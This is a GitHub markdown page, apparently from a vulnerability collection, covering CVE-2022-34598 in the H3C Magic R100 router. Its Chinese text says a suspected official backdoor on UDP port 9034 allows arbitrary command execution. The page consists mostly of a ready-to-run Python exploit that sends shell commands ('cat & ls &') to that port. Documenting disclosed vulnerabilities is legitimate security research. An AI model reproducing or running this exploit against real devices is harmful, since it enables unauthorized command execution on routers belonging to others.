Skip to content

Latest commit

 

History

History
22 lines (15 loc) · 579 Bytes

H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598).md

File metadata and controls

22 lines (15 loc) · 579 Bytes

H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598)

H3C Magic R100 存在安全漏洞,该漏洞源于updserver服务打开了疑似官方后门的9034端口,允许攻击者执行任意命令。

exp

import socket

Ip="0.0.0.0"
Port=9034

msg=b"cat & ls &"
server_address=(Ip,Port)

udp_socket=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket.sendto(msg,server_address)

udp_socket.close()

漏洞来源